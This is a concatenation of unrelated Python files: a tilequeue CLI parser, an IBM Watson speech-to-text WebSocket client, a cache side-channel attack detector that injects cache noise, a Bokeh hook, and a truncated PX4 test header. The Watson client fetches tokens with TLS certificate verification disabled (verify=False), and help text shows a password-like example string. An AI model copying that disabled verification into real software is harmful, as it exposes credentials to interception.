('stuck-tiles', tilequeue_stuck_tiles),
('delete-stuck-tiles', tilequeue_delete_stuck_tiles),
('rawr-process', tilequeue_rawr_process),
('rawr-seed-toi', tilequeue_rawr_seed_toi),
('rawr-seed-all', tilequeue_rawr_seed_all),
)
def _make_peripherals(cfg):
redis_client = make_redis_client(cfg)
toi_helper = make_toi_helper(cfg)
tile_queue_result = make_tile_queue(
cfg.queue_cfg, cfg.yml, redis_client)
tile_queue_name_map = {}
if isinstance(tile_queue_result, tuple):
tile_queue, queue_name = tile_queue_result
tile_queue_name_map[queue_name] = tile_queue
else:
assert isinstance(tile_queue_result, list), \
'Unknown tile_queue result: %s' % tile_queue_result
for tile_queue, queue_name in tile_queue_result:
tile_queue_name_map[queue_name] = tile_queue
queue_mapper_yaml = cfg.yml.get('queue-mapping')
assert queue_mapper_yaml, 'Missing queue-mapping configuration'
queue_mapper = make_queue_mapper(
queue_mapper_yaml, tile_queue_name_map, toi_helper)
msg_marshall_yaml = cfg.yml.get('message-marshall')
assert msg_marshall_yaml, 'Missing message-marshall config'
msg_marshaller = make_message_marshaller(msg_marshall_yaml)
inflight_yaml = cfg.yml.get('in-flight')
inflight_mgr = make_inflight_manager(inflight_yaml, redis_client)
enqueue_batch_size = 10
from tilequeue.queue.writer import QueueWriter
queue_writer = QueueWriter(
queue_mapper, msg_marshaller, inflight_mgr, enqueue_batch_size)
stats = make_statsd_client_from_cfg(cfg)
peripherals = Peripherals(
toi_helper, stats, redis_client, queue_mapper, msg_marshaller,
inflight_mgr, queue_writer
)
return peripherals
def _make_peripherals_command(func):
def command_fn(cfg, args):
peripherals = _make_peripherals(cfg)
return func(cfg, peripherals)
return command_fn
def _make_peripherals_with_args_command(func):
def command_fn(cfg, args):
peripherals = _make_peripherals(cfg)
return func(cfg, peripherals, args)
return command_fn
for parser_name, func in cfg_commands:
subparser = subparsers.add_parser(parser_name)
# config parameter is shared amongst all parsers, but appears here so
# that it can be given _after_ the name of the command.
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
command_fn = _make_peripherals_command(func)
subparser.set_defaults(func=command_fn)
# add "special" commands which take arguments
subparser = subparsers.add_parser('tile-status')
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
subparser.add_argument('coords', nargs='*',
help='Tile coordinates as "z/x/y".')
subparser.set_defaults(
func=_make_peripherals_with_args_command(tilequeue_tile_status))
subparser = subparsers.add_parser('tile')
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
subparser.add_argument('coord',
help='Tile coordinate as "z/x/y".')
subparser.set_defaults(
func=_make_peripherals_with_args_command(tilequeue_process_tile))
subparser = subparsers.add_parser('enqueue-tiles-of-interest-pyramids')
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
subparser.add_argument('--zoom-start', type=int, required=False,
default=None, help='Zoom start')
subparser.add_argument('--zoom-stop', type=int, required=False,
default=None, help='Zoom stop, exclusive')
subparser.set_defaults(
func=_make_peripherals_with_args_command(
tilequeue_enqueue_full_pyramid_from_toi))
subparser = subparsers.add_parser('enqueue-random-pyramids')
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
subparser.add_argument('--zoom-start', type=int, required=False,
default=None, help='Zoom start')
subparser.add_argument('--zoom-stop', type=int, required=False,
default=None, help='Zoom stop, exclusive')
subparser.add_argument('gridsize', type=int, help='Dimension of grid size')
subparser.add_argument('n-samples', type=int,
help='Number of total samples')
subparser.set_defaults(
func=_make_peripherals_with_args_command(
tilequeue_enqueue_random_pyramids))
subparser = subparsers.add_parser('rawr-enqueue')
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
subparser.add_argument('--expiry-path', required=True,
help='path to tile expiry file')
subparser.set_defaults(func=tilequeue_rawr_enqueue)
subparser = subparsers.add_parser('meta-tile')
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
subparser.add_argument('--tile', required=True,
help='Tile coordinate as "z/x/y".')
subparser.add_argument('--run_id', required=False,
help='optional run_id used for logging')
subparser.add_argument('--postgresql_hosts', required=False,
help='optional string of a list of db hosts e.g. '
'`["aws.rds.url", "localhost"]`')
subparser.add_argument('--postgresql_dbnames', required=False,
help='optional string of a list of db names e.g. '
'`["gis"]`')
subparser.add_argument('--postgresql_user', required=False,
help='optional string of db user e.g. `gisuser`')
subparser.add_argument('--postgresql_password', required=False,
help='optional string of db password e.g. '
'`VHcDuAS0SYx2tlgTvtbuCXwlvO4pAtiGCuScJFjq7wersdfqwer`') # noqa
subparser.add_argument('--store_name', required=False,
help='optional string of a list of tile store '
'names e.g. `["my-meta-tiles-us-east-1"]`')
subparser.add_argument('--rawr_store_name', required=False,
help='optional string of rawr tile store '
'names e.g. `"my-rawr-tiles-us-east-1"`')
subparser.add_argument('--store_date_prefix', required=False,
help='optional string of store bucket date prefix '
'e.g. `20210426`')
subparser.add_argument('--batch_check_metafile_exists', required=False,
help='optional string of a boolean indicating '
'whether to check metafile exists or not '
'e.g. `false`')
subparser.add_argument('--s3_role_arn', required=False,
help='optional string of the S3 access role ARN'
'e.g. `arn:aws:iam::1234:role/DataAccess-tilebuild`') # noqa
subparser.add_argument('--s3_role_session_duration_s', required=False,
type=int,
help='optional integer which indicates the number '
'of seconds for the S3 session using the '
'provided s3_role_arn'
'e.g. `3600`')
subparser.set_defaults(func=tilequeue_meta_tile)
subparser = subparsers.add_parser('meta-tile-low-zoom')
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
subparser.add_argument('--tile', required=True,
help='Tile coordinate as "z/x/y".')
subparser.add_argument('--run_id', required=False,
help='optional run_id used for logging')
subparser.add_argument('--postgresql_hosts', required=False,
help='optional string of a list of db hosts e.g. `["aws.rds.url", "localhost"]`') # noqa
subparser.add_argument('--postgresql_dbnames', required=False,
help='optional string of a list of db names e.g. `["gis"]`') # noqa
subparser.add_argument('--postgresql_user', required=False,
help='optional string of db user e.g. `gisuser`')
subparser.add_argument('--postgresql_password', required=False,
help='optional string of db password e.g. `VHcDuAS0SYx2tlgTvtbuCXwlvO4pAtiGCuScJFjq7wersdfqwer`') # noqa
subparser.add_argument('--store_name', required=False,
help='optional string of a list of tile store names e.g. `["my-meta-tiles-us-east-1"]`') # noqa
subparser.add_argument('--rawr_store_name', required=False,
help='optional string of rawr tile store '
'names e.g. `"my-rawr-tiles-us-east-1"`')
subparser.add_argument('--store_date_prefix', required=False,
help='optional string of store bucket date prefix e.g. `20210426`') # noqa
subparser.add_argument('--batch_check_metafile_exists', required=False,
help='optional string of a boolean indicating whether to check metafile exists or not e.g. `false`') # noqa
subparser.add_argument('--s3_role_arn', required=False,
help='optional string of the S3 access role ARN'
'e.g. '
'`arn:aws:iam::1234:role/DataAccess-tilebuild`') # noqa
subparser.add_argument('--s3_role_session_duration_s', required=False,
type=int,
help='optional integer which indicates the number '
'of seconds for the S3 session using the '
'provided s3_role_arn'
'e.g. `3600`')
subparser.set_defaults(func=tilequeue_meta_tile_low_zoom)
subparser = subparsers.add_parser('rawr-tile')
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
subparser.add_argument('--tile', required=True,
help='Tile coordinate as "z/x/y".')
subparser.add_argument('--run_id', required=False,
help='optional run_id used for logging')
subparser.add_argument('--postgresql_hosts', required=False,
help='optional string of a list of db hosts e.g. '
'`["aws.rds.url", "localhost"]`')
subparser.add_argument('--postgresql_dbnames', required=False,
help='optional string of a list of db names e.g. '
'`["gis"]`')
subparser.add_argument('--postgresql_user', required=False,
help='optional string of db user e.g. `gisuser`')
subparser.add_argument('--postgresql_password', required=False,
help='optional string of db password e.g. '
'`VHcDuAS0SYx2tlgTvtbuCXwlvO4pAtiGCuScJFjq7wersdfqwer`') # noqa
subparser.add_argument('--store_name', required=False,
help='optional string of a list of tile store '
'names e.g. `["my-meta-tiles-us-east-1"]`')
subparser.add_argument('--rawr_store_name', required=False,
help='optional string of rawr tile store '
'names e.g. `"my-rawr-tiles-us-east-1"`')
subparser.add_argument('--store_date_prefix', required=False,
help='optional string of store bucket date prefix '
'which will override the prefix config'
' for meta tile and rawr tile s3 output'
'e.g. `20210426`')
subparser.add_argument('--batch_check_metafile_exists', required=False,
help='optional string of a boolean indicating '
'whether to check metafile exists or not '
'e.g. `false`')
subparser.add_argument('--s3_role_arn', required=False,
help='optional string of the S3 access role ARN'
'e.g. '
'`arn:aws:iam::1234:role/DataAccess-tilebuild`') # noqa
subparser.add_argument('--s3_role_session_duration_s', required=False,
type=int,
help='optional integer which indicates the number '
'of seconds for the S3 session using the '
'provided s3_role_arn'
'e.g. `3600`')
subparser.set_defaults(func=tilequeue_rawr_tile)
subparser = subparsers.add_parser('batch-enqueue')
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
subparser.add_argument('--file', required=False,
help='Path to file containing coords to enqueue')
subparser.add_argument('--tile', required=False,
help='Single coordinate to enqueue')
subparser.add_argument('--pyramid', type=bool, required=False,
help='Enqueue all coordinates below queue zoom')
subparser.set_defaults(func=tilequeue_batch_enqueue)
args = parser.parse_args(argv_args)
assert os.path.exists(args.config), \
'Config file {} does not exist!'.format(args.config)
if args.s3_role_arn:
assert args.s3_role_arn.strip(), 's3_role_arn is invalid'
assert args.s3_role_session_duration_s, \
's3_role_arn is provided but s3_role_session_duration_s is not'
assert args.s3_role_session_duration_s > 0, \
's3_role_session_duration_s is non-positive'
with open(args.config) as fh:
cfg = make_config_from_argparse(fh,
postgresql_hosts=args.postgresql_hosts,
postgresql_dbnames=args.postgresql_dbnames, # noqa
postgresql_user=args.postgresql_user,
postgresql_password=args.postgresql_password, # noqa
rawr_store_name=args.rawr_store_name,
store_name=args.store_name,
store_date_prefix=args.store_date_prefix, # noqa
batch_check_metafile_exists=args.batch_check_metafile_exists) # noqa
args.func(cfg, args)
|
sttClient.py
|
#
# Copyright IBM Corp. 2014
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Daniel Bolanos
# Date: 2015
# coding=utf-8
import json # json
import threading # multi threading
import os # for listing directories
import Queue # queue used for thread syncronization
import sys # system calls
import argparse # for parsing arguments
import base64 # necessary to encode in base64 according to the RFC2045 standard
import requests # python HTTP requests library
# WebSockets
from autobahn.twisted.websocket import WebSocketClientProtocol, WebSocketClientFactory, connectWS
from twisted.python import log
from twisted.internet import ssl, reactor
class Utils:
@staticmethod
def getAuthenticationToken(hostname, serviceName, username, password):
uri = hostname + "/authorization/api/v1/token?url=" + hostname + '/' + serviceName + "/api"
uri = uri.replace("wss://", "https://");
uri = uri.replace("ws://", "https://");
print uri
resp = requests.get(uri, auth=(username, password), verify=False, headers= {'Accept': 'application/json'},
timeout= (30, 30))
print resp.text
jsonObject = resp.json()
return jsonObject['token']
class WSInterfaceFactory(WebSocketClientFactory):
def __init__(self, queue, summary, dirOutput, contentType, model, url=None, headers=None, debug=None):
WebSocketClientFactory.__init__(self, url=url, headers=headers, debug=debug)
self.queue = queue
self.summary = summary
self.dirOutput = dirOutput
self.contentType = contentType
self.model = model
self.queueProto = Queue.Queue()
self.openHandshakeTimeout = 6
self.closeHandshakeTimeout = 6
# start the thread that takes care of ending the reactor so the script can finish automatically (without ctrl+c)
endingThread = threading.Thread(target=self.endReactor, args= ())
endingThread.daemon = True
endingThread.start()
def prepareUtterance(self):
try:
utt = self.queue.get_nowait()
self.queueProto.put(utt)
return True
except Queue.Empty:
print "getUtterance: no more utterances to process, queue is empty!"
return False
def endReactor(self):
self.queue.join()
print "about to stop the reactor!"
reactor.stop()
# this function gets called every time connectWS is called (once per WebSocket connection/session)
def buildProtocol(self, addr):
try:
utt = self.queueProto.get_nowait()
proto = WSInterfaceProtocol(self, self.queue, self.summary, self.dirOutput, self.contentType)
proto.setUtterance(utt)
return proto
except Queue.Empty:
print "queue should not be empty, otherwise this function should not have been called"
return None
# WebSockets interface to the STT service
# note: an object of this class is created for each WebSocket connection, every time we call connectWS
class WSInterfaceProtocol(WebSocketClientProtocol):
def __init__(self, factory, queue, summary, dirOutput, contentType):
self.factory = factory
self.queue = queue
self.summary = summary
self.dirOutput = dirOutput
self.contentType = contentType
self.packetRate = 20
self.listeningMessages = 0
self.timeFirstInterim = -1
self.bytesSent = 0
self.chunkSize = 2000 # in bytes
super(self.__class__, self).__init__()
print dirOutput
print "contentType: " + str(self.contentType) + " queueSize: " + str(self.queue.qsize())
def setUtterance(self, utt):
self.uttNumber = utt[0]
self.uttFilename = utt[1]
self.summary[self.uttNumber] = {"hypothesis":"",
"status":{"code":"", "reason":""}}
self.fileJson = self.dirOutput + "/" + str(self.uttNumber) + ".json.txt"
try:
os.remove(self.fileJson)
except OSError:
pass
# helper method that sends a chunk of audio if needed (as required what the specified pacing is)
def maybeSendChunk(self,data):
def sendChunk(chunk, final=False):
self.bytesSent += len(chunk)
self.sendMessage(chunk, isBinary = True)
if final:
self.sendMessage(b'', isBinary = True)
if (self.bytesSent+self.chunkSize >= len(data)):
if (len(data) > self.bytesSent):
sendChunk(data[self.bytesSent:len(data)],True)
return
sendChunk(data[self.bytesSent:self.bytesSent+self.chunkSize])
self.factory.reactor.callLater(0.01, self.maybeSendChunk, data=data)
return
def onConnect(self, response):
print "onConnect, server connected: {0}".format(response.peer)
def onOpen(self):
print "onOpen"
data = {"action" : "start", "content-type" : str(self.contentType), "continuous" : True, "interim_results" : True, "inactivity_timeout": 600}
data['word_confidence'] = True
data['timestamps'] = True
data['max_alternatives'] = 3
print "sendMessage(init)"
# send the initialization parameters
self.sendMessage(json.dumps(data).encode('utf8'))
# start sending audio right away (it will get buffered in the STT service)
print self.uttFilename
f = open(str(self.uttFilename),'rb')
self.bytesSent = 0
dataFile = f.read()
self.maybeSendChunk(dataFile)
print "onOpen ends"
def onMessage(self, payload, isBinary):
if isBinary:
print("Binary message received: {0} bytes".format(len(payload)))
else:
print(u"Text message received: {0}".format(payload.decode('utf8')))
# if uninitialized, receive the initialization response from the server
jsonObject = json.loads(payload.decode('utf8'))
if 'state' in jsonObject:
self.listeningMessages += 1
if (self.listeningMessages == 2):
print "sending close 1000"
# close the connection
self.sendClose(1000)
# if in streaming
elif 'results' in jsonObject:
jsonObject = json.loads(payload.decode('utf8'))
hypothesis = ""
# empty hypothesis
if (len(jsonObject['results']) == 0):
print "empty hypothesis!"
# regular hypothesis
else:
# dump the message to the output directory
jsonObject = json.loads(payload.decode('utf8'))
f = open(self.fileJson,"a")
f.write(json.dumps(jsonObject, indent=4, sort_keys=True))
f.close()
hypothesis = jsonObject['results'][0]['alternatives'][0]['transcript']
bFinal = (jsonObject['results'][0]['final'] == True)
if bFinal:
print "final hypothesis: \"" + hypothesis + "\""
self.summary[self.uttNumber]['hypothesis'] += hypothesis
else:
print "interim hyp: \"" + hypothesis + "\""
def onClose(self, wasClean, code, reason):
print("onClose")
print("WebSocket connection closed: {0}".format(reason), "code: ", code, "clean: ", wasClean, "reason: ", reason)
self.summary[self.uttNumber]['status']['code'] = code
self.summary[self.uttNumber]['status']['reason'] = reason
if (code == 1000):
self.summary[self.uttNumber]['status']['successful'] = True
# create a new WebSocket connection if there are still utterances in the queue that need to be processed
self.queue.task_done()
if self.factory.prepareUtterance() == False:
return
# SSL client context: default
if self.factory.isSecure:
contextFactory = ssl.ClientContextFactory()
else:
contextFactory = None
connectWS(self.factory, contextFactory)
# function to check that a value is a positive integer
def check_positive_int(value):
ivalue = int(value)
if ivalue < 1:
raise argparse.ArgumentTypeError("\"%s\" is an invalid positive int value" % value)
return ivalue
# function to check the credentials format
def check_credentials(credentials):
elements = credentials.split(":")
if (len(elements) == 2):
return elements
else:
raise argparse.ArgumentTypeError("\"%s\" is not a valid format for the credentials " % credentials)
if __name__ == '__main__':
# parse command line parameters
parser = argparse.ArgumentParser(description='client to do speech recognition using the WebSocket interface to the Watson STT service')
parser.add_argument('-credentials', action='store', dest='credentials', help='Basic Authentication credentials in the form \'username:password\'', type=check_credentials)
parser.add_argument('-in', action='store', dest='fileInput', default='./recordings.txt', help='text file containing audio files')
parser.add_argument('-out', action='store', dest='dirOutput', default='./output', help='output directory')
parser.add_argument('-type', action='store', dest='contentType', default='audio/wav', help='audio content type, for example: \'audio/l16; rate=44100\'')
parser.add_argument('-model', action='store', dest='model', default='en-US_BroadbandModel', help='STT model that will be used')
parser.add_argument('-threads', action='store', dest='threads', default='1', help='number of simultaneous STT sessions', type=check_positive_int)
parser.add_argument('-tokenauth', action='store_true', dest='tokenauth', help='use token based authentication')
args = parser.parse_args()
# create output directory if necessary
if (os.path.isdir(args.dirOutput)):
while True:
answer = raw_input("the output directory \"" + args.dirOutput + "\" already exists, overwrite? (y/n)? ")
if (answer == "n"):
sys.stderr.write("exiting...")
sys.exit()
elif (answer == "y"):
break
else:
os.makedirs(args.dirOutput)
# logging
log.startLogging(sys.stdout)
# add audio files to the processing queue
q = Queue.Queue()
lines = [line.rstrip('\n') for line in open(args.fileInput)]
fileNumber = 0
for fileName in(lines):
print fileName
q.put((fileNumber,fileName))
fileNumber += 1
hostname = "stream.watsonplatform.net"
headers = {}
# authentication header
if args.tokenauth:
headers['X-Watson-Authorization-Token'] = Utils.getAuthenticationToken("https://" + hostname, 'speech-to-text',
args.credentials[0], args.credentials[1])
else:
string = args.credentials[0] + ":" + args.credentials[1]
headers["Authorization"] = "Basic " + base64.b64encode(string)
# create a WS server factory with our protocol
url = "wss://" + hostname + "/speech-to-text/api/v1/recognize?model=" + args.model
summary = {}
factory = WSInterfaceFactory(q, summary, args.dirOutput, args.contentType, args.model, url, headers, debug=False)
factory.protocol = WSInterfaceProtocol
for i in range(min(int(args.threads),q.qsize())):
factory.prepareUtterance()
# SSL client context: default
if factory.isSecure:
contextFactory = ssl.ClientContextFactory()
else:
contextFactory = None
connectWS(factory, contextFactory)
reactor.run()
# dump the hypotheses to the output file
fileHypotheses = args.dirOutput + "/hypotheses.txt"
f = open(fileHypotheses,"w")
counter = 1
successful = 0
emptyHypotheses = 0
for key, value in (sorted(summary.items())):
if value['status']['successful'] == True:
print key, ": ", value['status']['code'], " ", value['hypothesis'].encode('utf-8')
successful += 1
if value['hypothesis'][0] == "":
emptyHypotheses += 1
else:
print key + ": ", value['status']['code'], " REASON: ", value['status']['reason']
f.write(str(counter) + ": " + value['hypothesis'].encode('utf-8') + "\n")
counter += 1
f.close()
print "successful sessions: ", successful, " (", len(summary)-successful, " errors) (" + str(emptyHypotheses) + " empty hypotheses)"
|
scam.py
|
import sys
import subprocess
import threading
import time
import socket
import shlex
import psutil
import os
import errno
from operator import truediv
import numpy
import DynamicUpdate
import ConfigParser
import matplotlib.pyplot as plt
config = ConfigParser.ConfigParser()
config.read ("scam.ini")
keepRunning = True
attackActive = False
def ConfigSectionMap(section):
dict1 = {}
options = config.options(section)
for option in options:
try:
dict1[option] = config.get(section, option)
if dict1[option] == -1:
print("skip: %s" % option)
except:
print("exception on %s!" % option)
dict1[option] = None
return dict1
# Read parameters from ini
# quickhpc
NUM_OF_KEYS_PER_CHUNK = int(ConfigSectionMap("quickhpc")['num_of_keys_per_chunk'])
DECRYPT_DURATION = int(ConfigSectionMap("quickhpc")['decrypt_duration'])
SLEEP_DURATION = int(ConfigSectionMap("quickhpc")['sleep_duration'])
QUICKHPC_PATH = os.path.join(os.path.dirname(os.getcwd()), "quickhpc/quickhpc")
QUICKHPC_NUM_OF_ITERATION = ConfigSectionMap("quickhpc")['num_of_iteration']
QUICKHPC_INTERVAL_DURATION = ConfigSectionMap("quickhpc")['interval_duration']
QUICKHPC_CONF = os.path.join(os.path.dirname(os.getcwd()), "quickhpc/events.conf")
QUICKHPC_CHUNK = ((DECRYPT_DURATION + SLEEP_DURATION)) * NUM_OF_KEYS_PER_CHUNK
MONITOR_WINDOW = int(ConfigSectionMap("quickhpc")['monitor_window'])
WINDOW_AVG_THRESH = float(ConfigSectionMap("quickhpc")['window_avg_thresh'])
DETECT_THRESH = int(ConfigSectionMap("quickhpc")['detect_thresh'])
quickhpc_log_filename = ConfigSectionMap("quickhpc")['log_filename']
# SCAM
plotEnable = config.getboolean("scam", "plot_enable")
Scam_Cores = ConfigSectionMap("scam")['scam_cores'].split(",")
# Noisification
noisification_log_filename = ConfigSectionMap("noisification")['log_filename']
NOISIFICATION_PATH = os.path.join(os.path.dirname(os.getcwd()), "scam_noisification/scam/tool")
Min_Rumble_Duration = ConfigSectionMap("noisification")['min_rumble_duration']
Is_Complement_To = config.getboolean("noisification","is_complement_to")
LINES_PER_SET = int(ConfigSectionMap("noisification")['lines_per_set'])
Noise_Intensity = ConfigSectionMap("noisification")['noise_intensity'].split(",")
# Socket Communication Defines
server_request = ConfigSectionMap("comm")['server_request']
server_response = ConfigSectionMap("comm")['server_response']
TCP_PORT = int(ConfigSectionMap("comm")['tcp_port'])
TCP_IP = ConfigSectionMap("comm")['tcp_ip']
BUFFER_SIZE = int(ConfigSectionMap("comm")['buffer_size'])
DEMO_ARRAY_LEN = 300
noise_sock = None
target_sock = None
if Is_Complement_To:
Noise_Intensity[0] = str(int(Noise_Intensity[0])+LINES_PER_SET+1)
Noise_Intensity[1] = '0'
def pid_exists(pid):
"""Check whether pid exists in the current process table.
UNIX only.
"""
if pid < 0:
return False
if pid == 0:
# According to "man 2 kill" PID 0 refers to every process
# in the process group of the calling process.
# On certain systems 0 is a valid PID but we have no way
# to know that in a portable fashion.
raise ValueError('invalid PID 0')
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
# ESRCH == No such process
return False
elif err.errno == errno.EPERM:
# EPERM clearly means there's a process to deny access to
return True
else:
# According to "man 2 kill" possible error values are
# (EINVAL, EPERM, ESRCH)
raise
else:
return True
def process_logger(pipe_from, pipe_dst, file_lock=None):
global keepRunning
while keepRunning:
line = pipe_from.readline()
if line:
if file_lock is not None:
with file_lock:
pipe_dst.write(line)
pipe_dst.flush()
else:
pipe_dst.write(line)
pipe_dst.flush()
else:
time.sleep (1)
pipe_dst.close()
#
# def analyzeSamples(samples,monitorChart):
# ratio = []
# for line in samples:
# PAPI_L3_TCM = map(int,line.split(','))[0]
# ratio.append(PAPI_L3_TCM)
# filterValueThresh = sorted(ratio)[len(ratio)*90/100]
# if plotEnable:
# ratioIndex = range (0, len (ratio))
# monitorChart.update (ratioIndex, ratio)
# j = 2
# while j<len(ratio)-2:
# if ratio[j] > filterValueThresh: # avereage anomalities
# ratio[j] = int(numpy.mean([ratio[j-2],ratio[j-1],ratio[j],ratio[j+1]]))
# j+=1
#
# j=0
# minRatio = int(numpy.max(ratio)) # init min
# while j<len(ratio)-10:
# tmpMeanRatio = int(numpy.mean(ratio[j:j+10]))
# if tmpMeanRatio < minRatio:
# minRatio = tmpMeanRatio
# j+=10
#
# thresholdForAnomaly = monitorAnomalyThreshold + minRatio
# j=0
# while j < len(ratio):
# if ratio[j] > thresholdForAnomaly:
# ratio[j] = 1
# else:
# ratio[j] = 0
# j+=1
# zeroIndex = 0
# j = 0
# ratio[len(ratio)-1] = 0
# while j < len(ratio):
# if ratio[j] == 0:
# if j-zeroIndex < 10:
# ratio[zeroIndex:j] = numpy.full(j-zeroIndex,0)
# zeroIndex = j
# j += 1
#
# j = 0
# while j < len (ratio):
# if ratio[j] == 1:
# return True
# j += 1
# return False
def quickhpc_analyzer(pipe_from):
noiseActive = False
lastTimeAttack = 0
attackActive = None
lines = []
monitorChart = None
if plotEnable:
monitorChart = DynamicUpdate.DynamicUpdate()
monitorChart.on_launch(0,NUM_OF_KEYS_PER_CHUNK * (SLEEP_DURATION + DECRYPT_DURATION),0,1)
global keepRunning, noise_sock
counter = 0
window = [0] * MONITOR_WINDOW
window_sum = 0
pointer = 0
demo_array = []
detectCounter = 0
while keepRunning:
line = pipe_from.readline()
if line:
PAPI_L3_TCM,PAPI_L3_TCA = map (float, line.split (','))
try:
miss_ratio = truediv(PAPI_L3_TCM,PAPI_L3_TCA)
except ZeroDivisionError:
continue
if counter <= MONITOR_WINDOW: #to collect enough data for avg
counter += 1
pointer = (pointer + 1) % MONITOR_WINDOW
tmp = window[pointer]
window[pointer] = miss_ratio
window_sum += miss_ratio - tmp
window_avg = window_sum / MONITOR_WINDOW
if counter < MONITOR_WINDOW:
continue
if plotEnable:
demo_array.append(window_avg)
if len(demo_array) == DEMO_ARRAY_LEN:
monitorChart.update (range(len(demo_array)), demo_array)
demo_array = []
curr_time = time.time ()
if(window_avg > WINDOW_AVG_THRESH):
detectCounter+=1
else:
detectCounter=0
detect = (detectCounter>DETECT_THRESH)
attackActive_r = attackActive
if detect:
attackActive = True
lastTimeAttack = curr_time
if noiseActive is False:
print ("Turning On Noise")
send_to_client (noise_sock, "6 {} {} {} {}".format(Noise_Intensity[0],Noise_Intensity[1],Scam_Cores[0],Scam_Cores[1]))
noiseActive = True
else:
attackActive = False
if (noiseActive is True) and int(curr_time - lastTimeAttack) > int(Min_Rumble_Duration):
print "Turning Off Noise"
send_to_client (noise_sock, "7")
noiseActive = False
if attackActive_r != attackActive:
print "Attack: {}".format(attackActive)
def send_to_client(client_socket,msg):
client_socket.send(msg)
request = client_socket.recv(1024)
print 'Received {}'.format(request)
def main():
global huge_array, keepRunning, lastTimeAttack, noise_sock, target_sock,TCP_PORT
p = psutil.Process ()
p.cpu_affinity([int(Scam_Cores[1])])
# vars
server = None
noisification_log_file = None
quickhpc_log_file = None
result = False
try:
# flush memory - should run with sudo
os.system ("sh -c 'echo 3 >/proc/sys/vm/drop_caches'")
server = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt (socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.listen(2) # max backlog of connections
TCP_IP, TCP_PORT = server.getsockname()
# Create socket
# print 'Waiting for target, at {}:{}'.format (TCP_IP, TCP_PORT)
# target_sock, address = server.accept ()
# print "target - Connection address:{}".format(address)
# open scam_noisification as a subprocess
noisification_log_file = open(noisification_log_filename, "w")
noisification_log_proc = subprocess.Popen(shlex.split("xterm -e tail -f " + noisification_log_filename), stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
noisification_proc = subprocess.Popen([NOISIFICATION_PATH,str(TCP_PORT)], stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
noisification_stdout = threading.Thread(target = process_logger, args=(noisification_proc.stdout, noisification_log_file))
noisification_stdout.start ()
print 'Listening on {}:{}'.format (TCP_IP, TCP_PORT)
noise_sock, address = server.accept ()
print "noisification - Connection address:{}".format(address)
# data = target_sock.recv (BUFFER_SIZE)
# while True:
# if data == server_request:
# break
# print "received data:{}".format(data)
# Ranking I
send_to_client (noise_sock, "2")
# print "sending response to server {}".format(server_response)
# send_to_client (target_sock, server_response)
raw_input("Turn on the target, start the decryption process, and press any key...")
time.sleep(2) # wait for server to start decrypt
# Ranking II
send_to_client (noise_sock, "3")
# Quickhpc
target_pid = raw_input("to start monitoring, please enter target PID:")
while not pid_exists(int(target_pid)):
target_pid = raw_input("Wrong PID, try again, please enter target PID:")
quickhpc_cmd = QUICKHPC_PATH + " -a " + target_pid + \
" -c " + QUICKHPC_CONF + " -i " + QUICKHPC_INTERVAL_DURATION + \
" -n " + QUICKHPC_NUM_OF_ITERATION
quickhpc_log_file = open(quickhpc_log_filename,"w")
quickhpc_file_lock = threading.Lock()
quickhpc_proc = subprocess.Popen(shlex.split(quickhpc_cmd),stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
quickhpc_analyzer_proc = threading.Thread(target = quickhpc_analyzer, args=[quickhpc_proc.stdout])
quickhpc_stderr = threading.Thread(target = process_logger, args=(quickhpc_proc.stderr,quickhpc_log_file,quickhpc_file_lock))
lastTimeAttack = int(time.time())
quickhpc_analyzer_proc.start()
quickhpc_stderr.start()
while True:
time.sleep(0.01)
except (KeyboardInterrupt, SystemExit):
pass
finally:
try:
if server is not None:
server.close()
keepRunning = False
noisification_log_proc.kill ()
noisification_proc.kill()
if noisification_stdout.isAlive():
noisification_stdout.join()
quickhpc_proc.kill()
if quickhpc_analyzer_proc is not None and quickhpc_analyzer_proc.isAlive():
quickhpc_analyzer_proc.join()
if quickhpc_stderr is not None and quickhpc_stderr.isAlive():
quickhpc_stderr.join()
if quickhpc_log_file is not None:
quickhpc_log_file.close()
if noisification_log_file is not None:
noisification_log_file.close()
except UnboundLocalError:
pass
return result
if __name__ == "__main__":
sys.exit(main())
|
app_hooks.py
|
from threading import Thread
from . import audio
def on_server_loaded(server_context):
t = Thread(target=audio.update_audio_data, args=())
t.setDaemon(True)
t.start()
|
mavros_offboard_attctl_test.py
|
#!/usr/bin/env python2
#***************************************************************************
#
# Copyright (c) 2015 PX4 Development Team. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# 3. Neither the name PX4 nor the names of its contributors may be
# used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
